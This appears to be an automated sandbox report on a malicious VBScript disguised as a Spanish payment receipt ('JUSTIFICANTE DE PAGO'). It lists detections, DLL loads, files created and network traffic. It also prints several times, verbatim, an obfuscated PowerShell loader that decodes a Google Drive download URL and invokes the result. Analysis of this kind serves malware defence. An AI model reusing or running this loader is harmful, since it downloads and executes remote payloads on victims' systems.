Source: powershell.exe, 00000001.00000002.1781635386.000001FF5DE20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DE39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DEA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FAEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5DE20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DE39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DEA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FAEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5DE20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DE39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DEA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FAEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownHTTPS traffic detected: 142.250.101.100:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.4:49731 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: amsi64_7348.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7348, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Very long command line found
Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7086
Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7086Jump to behavior
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Spiritusestes = 1;$civilisationen='Substrin';$civilisationen+='g';Function Ulnage($Roadless){$Havnebassinet=$Roadless.Length-$Spiritusestes;For($Kuldeblgerne=5; $Kuldeblgerne -lt $Havnebassinet; $Kuldeblgerne+=(6)){$anthracolithic+=$Roadless.$civilisationen.Invoke($Kuldeblgerne, $Spiritusestes);}$anthracolithic;}function Multiplikatorernes($Fngsledes){. ($Tythed) ($Fngsledes);}$unlogged=Ulnage '.ceanMSkalaoB silz An.oiTimeblRadiolBevisaUnflu/Broom5Cacod.Engen0Ba.dh oplsn(Bu,gaWEnligiBilspnEmiredDatafo r,mow Unins oilo Kab.lNSalonTBr.kk Anac1 lom0 Kret. litu0Plagi;Total Ing.aWViz.ri egalnCarci6F,ske4C rru;Robus bidrax Grou6,kaer4arve ;Ek,am Fodfsr Luntv bene:Heme,1 T,lm2m end1Maend.Progr0 un.e)Predr TranGPlatfeEkspacSpr skCreamo tect/ Stan2Vask.0 Midw1 Lecy0Opskr0Perso1 Tilr0Eksam1etabl Ka.keFInteri Rgelr LucieknoerfAssobo F.rtxEleme/Esthe1Nnned2Allia1Anmel.Frede0Galip ';$Zootechnician=Ulnage 'UbrudUBermusKo,ere,kiderBusti- TramAamitigGgerdeWeaponBe,tmtConv ';$Blikdaases93=Ulnage ' .etrh necttGrimitKashipJustssSnerp:Manaf/ udbl/i ddadfarverInkasiDegorv,xploeM,sra..kyftgCapo oFantooGuigngA.tralBlk peAller..ntrac Subdo Cha mElpid/ElenduTailocrek.m?censueContexFemetpVebogoBill.rChastt Form=Asymmd Fun.oMikrowtransnVirtulForstoFoliaa Syklda aly& Railiabri dTilfa=Overf1 PolykcozenXGreteT ndemNPr.staRotato EftexDoeglL SeklJHypotpBruskhWoodbfRetracS.indA Sa.mV ChucSO.ymplDataeYDise.x Nyt.VPersooUdloelIn.erDOv.rs7,alelHEnleauUndubHEnleah BuksKBimleCalarmJForv.XVidsy ';$Timbalernes=Ulnage 'Pa,ie> Read ';$Tythed=Ulnage ' vermist,tset,lsjxTyde. ';$Conidium='Historicize';Multiplikatorernes (Ulnage 'P,psiSVlteneSlnggtMeteo-Filr C Wil oKlaptn Lym.tReinseZincenmyliut Fu.d Hemic-SpiseP N.nraP.robtChickh.onde ugenTOp ev:Retab\SydafV RummiPsychcRettea .amirStrmp.Kro.stB,bylxUpliftLed n A.rom-BiogrVCaramaTekstlSer,iuPelseeDingt Dy de$RulleCMa ero SeminImpliiRampidletpai Gn.du spanmV.jto;.nher ');Multiplikatorernes (Ulnage ' hizaiU skifunme, twelv(Est at Dekoe ngodsSjlert micr-TomatpengjaaTingetCharthBusre AakanTBaloc:Boghy\LandzVFumeriPremoc Ko,sasitcor,alsa.SwotttAftgtx Casit Depo)Forbr{D.mpveGeorgxNeuroi EscatRest.}Bermm;Ptsa, ');$Germind = Ulnage 'Cledge SwatcSwingh Strao.deli Trin%Backsa PincpKlamppBelbsdKvadraReflet Mi maVolut%Sqush\De,erSG mmioForetmAmplieArchesBol,gtRemsehMicr.eFejl sInconiSpiriaBoros.M,resST,nerkTypiseOd.rl Pella&Ti sm& Hall Be pee N.ttcSawbohNontioDepre Fraso$incor ';Multiplikatorernes (Ulnage 'domin$ .tolgStje lIn,oroSkarpbMut naBlo,llSt ig:CerasN MuniuOmplal GraniPluggnKanoedUnmelkKarbuoH.rdemTaws.sFolketFr.dreS,urrnMotte=Jrgen(P.eudcdebr.mI,cludVrks. ommis/Mastec Foli Te.n$AmesiGMoolee Deicr.ninnm,seudiFi,kon bankd M.te)Ratla ');Multiplikatorernes (Ulnage 'Metop$H.insglgegulJulefoTrg,ebF.rmuaFortelDek.i:EndomPPost.cJvn,aeTeglbrNo ennKontreKant,=Kia.c$Cu geB SkralUngkaiCamankass,cd YorkaFla,kaSa.ansalmineplumbs
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Spiritusestes = 1;$civilisationen='Substrin';$civilisationen+='g';Function Ulnage($Roadless){$Havnebassinet=$Roadless.Length-$Spiritusestes;For($Kuldeblgerne=5; $Kuldeblgerne -lt $Havnebassinet; $Kuldeblgerne+=(6)){$anthracolithic+=$Roadless.$civilisationen.Invoke($Kuldeblgerne, $Spiritusestes);}$anthracolithic;}function Multiplikatorernes($Fngsledes){. ($Tythed) ($Fngsledes);}$unlogged=Ulnage '.ceanMSkalaoB silz An.oiTimeblRadiolBevisaUnflu/Broom5Cacod.Engen0Ba.dh oplsn(Bu,gaWEnligiBilspnEmiredDatafo r,mow Unins oilo Kab.lNSalonTBr.kk Anac1 lom0 Kret. litu0Plagi;Total Ing.aWViz.ri egalnCarci6F,ske4C rru;Robus bidrax Grou6,kaer4arve ;Ek,am Fodfsr Luntv bene:Heme,1 T,lm2m end1Maend.Progr0 un.e)Predr TranGPlatfeEkspacSpr skCreamo tect/ Stan2Vask.0 Midw1 Lecy0Opskr0Perso1 Tilr0Eksam1etabl Ka.keFInteri Rgelr LucieknoerfAssobo F.rtxEleme/Esthe1Nnned2Allia1Anmel.Frede0Galip ';$Zootechnician=Ulnage 'UbrudUBermusKo,ere,kiderBusti- TramAamitigGgerdeWeaponBe,tmtConv ';$Blikdaases93=Ulnage ' .etrh necttGrimitKashipJustssSnerp:Manaf/ udbl/i ddadfarverInkasiDegorv,xploeM,sra..kyftgCapo oFantooGuigngA.tralBlk peAller..ntrac Subdo Cha mElpid/ElenduTailocrek.m?censueContexFemetpVebogoBill.rChastt Form=Asymmd Fun.oMikrowtransnVirtulForstoFoliaa Syklda aly& Railiabri dTilfa=Overf1 PolykcozenXGreteT ndemNPr.staRotato EftexDoeglL SeklJHypotpBruskhWoodbfRetracS.indA Sa.mV ChucSO.ymplDataeYDise.x Nyt.VPersooUdloelIn.erDOv.rs7,alelHEnleauUndubHEnleah BuksKBimleCalarmJForv.XVidsy ';$Timbalernes=Ulnage 'Pa,ie> Read ';$Tythed=Ulnage ' vermist,tset,lsjxTyde. ';$Conidium='Historicize';Multiplikatorernes (Ulnage 'P,psiSVlteneSlnggtMeteo-Filr C Wil oKlaptn Lym.tReinseZincenmyliut Fu.d Hemic-SpiseP N.nraP.robtChickh.onde ugenTOp ev:Retab\SydafV RummiPsychcRettea .amirStrmp.Kro.stB,bylxUpliftLed n A.rom-BiogrVCaramaTekstlSer,iuPelseeDingt Dy de$RulleCMa ero SeminImpliiRampidletpai Gn.du spanmV.jto;.nher ');Multiplikatorernes (Ulnage ' hizaiU skifunme, twelv(Est at Dekoe ngodsSjlert micr-TomatpengjaaTingetCharthBusre AakanTBaloc:Boghy\LandzVFumeriPremoc Ko,sasitcor,alsa.SwotttAftgtx Casit Depo)Forbr{D.mpveGeorgxNeuroi EscatRest.}Bermm;Ptsa, ');$Germind = Ulnage 'Cledge SwatcSwingh Strao.deli Trin%Backsa PincpKlamppBelbsdKvadraReflet Mi maVolut%Sqush\De,erSG mmioForetmAmplieArchesBol,gtRemsehMicr.eFejl sInconiSpiriaBoros.M,resST,nerkTypiseOd.rl Pella&Ti sm& Hall Be pee N.ttcSawbohNontioDepre Fraso$incor ';Multiplikatorernes (Ulnage 'domin$ .tolgStje lIn,oroSkarpbMut naBlo,llSt ig:CerasN MuniuOmplal GraniPluggnKanoedUnmelkKarbuoH.rdemTaws.sFolketFr.dreS,urrnMotte=Jrgen(P.eudcdebr.mI,cludVrks. ommis/Mastec Foli Te.n$AmesiGMoolee Deicr.ninnm,seudiFi,kon bankd M.te)Ratla ');Multiplikatorernes (Ulnage 'Metop$H.insglgegulJulefoTrg,ebF.rmuaFortelDek.i:EndomPPost.cJvn,aeTeglbrNo ennKontreKant,=Kia.c$Cu geB SkralUngkaiCamankass,cd YorkaFla,kaSa.ansalmineplumbsJump to behavior
Source: JUSTIFICANTE DE PAGO.vbsInitial sample: Strings found which are bigger than 50
Source: amsi64_7348.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7348, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal100.expl.evad.winVBS@6/4@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Somesthesia.SkeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7356:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_22vcjhx5.fss.ps1Jump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\JUSTIFICANTE DE PAGO.vbs"
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: JUSTIFICANTE DE PAGO.vbsReversingLabs: Detection: 21%
Source: JUSTIFICANTE DE PAGO.vbsVirustotal: Detection: 8%
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\JUSTIFICANTE DE PAGO.vbs"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Spiritusestes = 1;$civilisationen='Substrin';$civilisationen+='g';Function Ulnage($Roadless){$Havnebassinet=$Roadless.Length-$Spiritusestes;For($Kuldeblgerne=5; $Kuldeblgerne -lt $Havnebassinet; $Kuldeblgerne+=(6)){$anthracolithic+=$Roadless.$civilisationen.Invoke($Kuldeblgerne, $Spiritusestes);}$anthracolithic;}function Multiplikatorernes($Fngsledes){. ($Tythed) ($Fngsledes);}$unlogged=Ulnage '.ceanMSkalaoB silz An.oiTimeblRadiolBevisaUnflu/Broom5Cacod.Engen0Ba.dh oplsn(Bu,gaWEnligiBilspnEmiredDatafo r,mow Unins oilo Kab.lNSalonTBr.kk Anac1 lom0 Kret. litu0Plagi;Total Ing.aWViz.ri egalnCarci6F,ske4C rru;Robus bidrax Grou6,kaer4arve ;Ek,am Fodfsr Luntv bene:Heme,1 T,lm2m end1Maend.Progr0 un.e)Predr TranGPlatfeEkspacSpr skCreamo tect/ Stan2Vask.0 Midw1 Lecy0Opskr0Perso1 Tilr0Eksam1etabl Ka.keFInteri Rgelr LucieknoerfAssobo F.rtxEleme/Esthe1Nnned2Allia1Anmel.Frede0Galip ';$Zootechnician=Ulnage 'UbrudUBermusKo,ere,kiderBusti- TramAamitigGgerdeWeaponBe,tmtConv ';$Blikdaases93=Ulnage ' .etrh necttGrimitKashipJustssSnerp:Manaf/ udbl/i ddadfarverInkasiDegorv,xploeM,sra..kyftgCapo oFantooGuigngA.tralBlk peAller..ntrac Subdo Cha mElpid/ElenduTailocrek.m?censueContexFemetpVebogoBill.rChastt Form=Asymmd Fun.oMikrowtransnVirtulForstoFoliaa Syklda aly& Railiabri dTilfa=Overf1 PolykcozenXGreteT ndemNPr.staRotato EftexDoeglL SeklJHypotpBruskhWoodbfRetracS.indA Sa.mV ChucSO.ymplDataeYDise.x Nyt.VPersooUdloelIn.erDOv.rs7,alelHEnleauUndubHEnleah BuksKBimleCalarmJForv.XVidsy ';$Timbalernes=Ulnage 'Pa,ie> Read ';$Tythed=Ulnage ' vermist,tset,lsjxTyde. ';$Conidium='Historicize';Multiplikatorernes (Ulnage 'P,psiSVlteneSlnggtMeteo-Filr C Wil oKlaptn Lym.tReinseZincenmyliut Fu.d Hemic-SpiseP N.nraP.robtChickh.onde ugenTOp ev:Retab\SydafV RummiPsychcRettea .amirStrmp.Kro.stB,bylxUpliftLed n A.rom-BiogrVCaramaTekstlSer,iuPelseeDingt Dy de$RulleCMa ero SeminImpliiRampidletpai Gn.du spanmV.jto;.nher ');Multiplikatorernes (Ulnage ' hizaiU skifunme, twelv(Est at Dekoe ngodsSjlert micr-TomatpengjaaTingetCharthBusre AakanTBaloc:Boghy\LandzVFumeriPremoc Ko,sasitcor,alsa.SwotttAftgtx Casit Depo)Forbr{D.mpveGeorgxNeuroi EscatRest.}Bermm;Ptsa, ');$Germind = Ulnage 'Cledge SwatcSwingh Strao.deli Trin%Backsa PincpKlamppBelbsdKvadraReflet Mi maVolut%Sqush\De,erSG mmioForetmAmplieArchesBol,gtRemsehMicr.eFejl sInconiSpiriaBoros.M,resST,nerkTypiseOd.rl Pella&Ti sm& Hall Be pee N.ttcSawbohNontioDepre Fraso$incor ';Multiplikatorernes (Ulnage 'domin$ .tolgStje lIn,oroSkarpbMut naBlo,llSt ig:CerasN MuniuOmplal GraniPluggnKanoedUnmelkKarbuoH.rdemTaws.sFolketFr.dreS,urrnMotte=Jrgen(P.eudcdebr.mI,cludVrks. ommis/Mastec Foli Te.n$AmesiGMoolee Deicr.ninnm,seudiFi,kon bankd M.te)Ratla ');Multiplikatorernes (Ulnage 'Metop$H.insglgegulJulefoTrg,ebF.rmuaFortelDek.i:EndomPPost.cJvn,aeTeglbrNo ennKontreKant,=Kia.c$Cu geB SkralUngkaiCamankass,cd YorkaFla,kaSa.ansalmineplumbs
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Somesthesia.Ske && echo $"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Spiritusestes = 1;$civilisationen='Substrin';$civilisationen+='g';Function Ulnage($Roadless){$Havnebassinet=$Roadless.Length-$Spiritusestes;For($Kuldeblgerne=5; $Kuldeblgerne -lt $Havnebassinet; $Kuldeblgerne+=(6)){$anthracolithic+=$Roadless.$civilisationen.Invoke($Kuldeblgerne, $Spiritusestes);}$anthracolithic;}function Multiplikatorernes($Fngsledes){. ($Tythed) ($Fngsledes);}$unlogged=Ulnage '.ceanMSkalaoB silz An.oiTimeblRadiolBevisaUnflu/Broom5Cacod.Engen0Ba.dh oplsn(Bu,gaWEnligiBilspnEmiredDatafo r,mow Unins oilo Kab.lNSalonTBr.kk Anac1 lom0 Kret. litu0Plagi;Total Ing.aWViz.ri egalnCarci6F,ske4C rru;Robus bidrax Grou6,kaer4arve ;Ek,am Fodfsr Luntv bene:Heme,1 T,lm2m end1Maend.Progr0 un.e)Predr TranGPlatfeEkspacSpr skCreamo tect/ Stan2Vask.0 Midw1 Lecy0Opskr0Perso1 Tilr0Eksam1etabl Ka.keFInteri Rgelr LucieknoerfAssobo F.rtxEleme/Esthe1Nnned2Allia1Anmel.Frede0Galip ';$Zootechnician=Ulnage 'UbrudUBermusKo,ere,kiderBusti- TramAamitigGgerdeWeaponBe,tmtConv ';$Blikdaases93=Ulnage ' .etrh necttGrimitKashipJustssSnerp:Manaf/ udbl/i ddadfarverInkasiDegorv,xploeM,sra..kyftgCapo oFantooGuigngA.tralBlk peAller..ntrac Subdo Cha mElpid/ElenduTailocrek.m?censueContexFemetpVebogoBill.rChastt Form=Asymmd Fun.oMikrowtransnVirtulForstoFoliaa Syklda aly& Railiabri dTilfa=Overf1 PolykcozenXGreteT ndemNPr.staRotato EftexDoeglL SeklJHypotpBruskhWoodbfRetracS.indA Sa.mV ChucSO.ymplDataeYDise.x Nyt.VPersooUdloelIn.erDOv.rs7,alelHEnleauUndubHEnleah BuksKBimleCalarmJForv.XVidsy ';$Timbalernes=Ulnage 'Pa,ie> Read ';$Tythed=Ulnage ' vermist,tset,lsjxTyde. ';$Conidium='Historicize';Multiplikatorernes (Ulnage 'P,psiSVlteneSlnggtMeteo-Filr C Wil oKlaptn Lym.tReinseZincenmyliut Fu.d Hemic-SpiseP N.nraP.robtChickh.onde ugenTOp ev:Retab\SydafV RummiPsychcRettea .amirStrmp.Kro.stB,bylxUpliftLed n A.rom-BiogrVCaramaTekstlSer,iuPelseeDingt Dy de$RulleCMa ero SeminImpliiRampidletpai Gn.du spanmV.jto;.nher ');Multiplikatorernes (Ulnage ' hizaiU skifunme, twelv(Est at Dekoe ngodsSjlert micr-TomatpengjaaTingetCharthBusre AakanTBaloc:Boghy\LandzVFumeriPremoc Ko,sasitcor,alsa.SwotttAftgtx Casit Depo)Forbr{D.mpveGeorgxNeuroi EscatRest.}Bermm;Ptsa, ');$Germind = Ulnage 'Cledge SwatcSwingh Strao.deli Trin%Backsa PincpKlamppBelbsdKvadraReflet Mi maVolut%Sqush\De,erSG mmioForetmAmplieArchesBol,gtRemsehMicr.eFejl sInconiSpiriaBoros.M,resST,nerkTypiseOd.rl Pella&Ti sm& Hall Be pee N.ttcSawbohNontioDepre Fraso$incor ';Multiplikatorernes (Ulnage 'domin$ .tolgStje lIn,oroSkarpbMut naBlo,llSt ig:CerasN MuniuOmplal GraniPluggnKanoedUnmelkKarbuoH.rdemTaws.sFolketFr.dreS,urrnMotte=Jrgen(P.eudcdebr.mI,cludVrks. ommis/Mastec Foli Te.n$AmesiGMoolee Deicr.ninnm,seudiFi,kon bankd M.te)Ratla ');Multiplikatorernes (Ulnage 'Metop$H.insglgegulJulefoTrg,ebF.rmuaFortelDek.i:EndomPPost.cJvn,aeTeglbrNo ennKontreKant,=Kia.c$Cu geB SkralUngkaiCamankass,cd YorkaFla,kaSa.ansalmineplumbsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Somesthesia.Ske && echo $"Jump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1808945712.000001FF75C8D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1809922936.000001FF75D2C000.00000004.00000020.00020000.00000000.sdmp
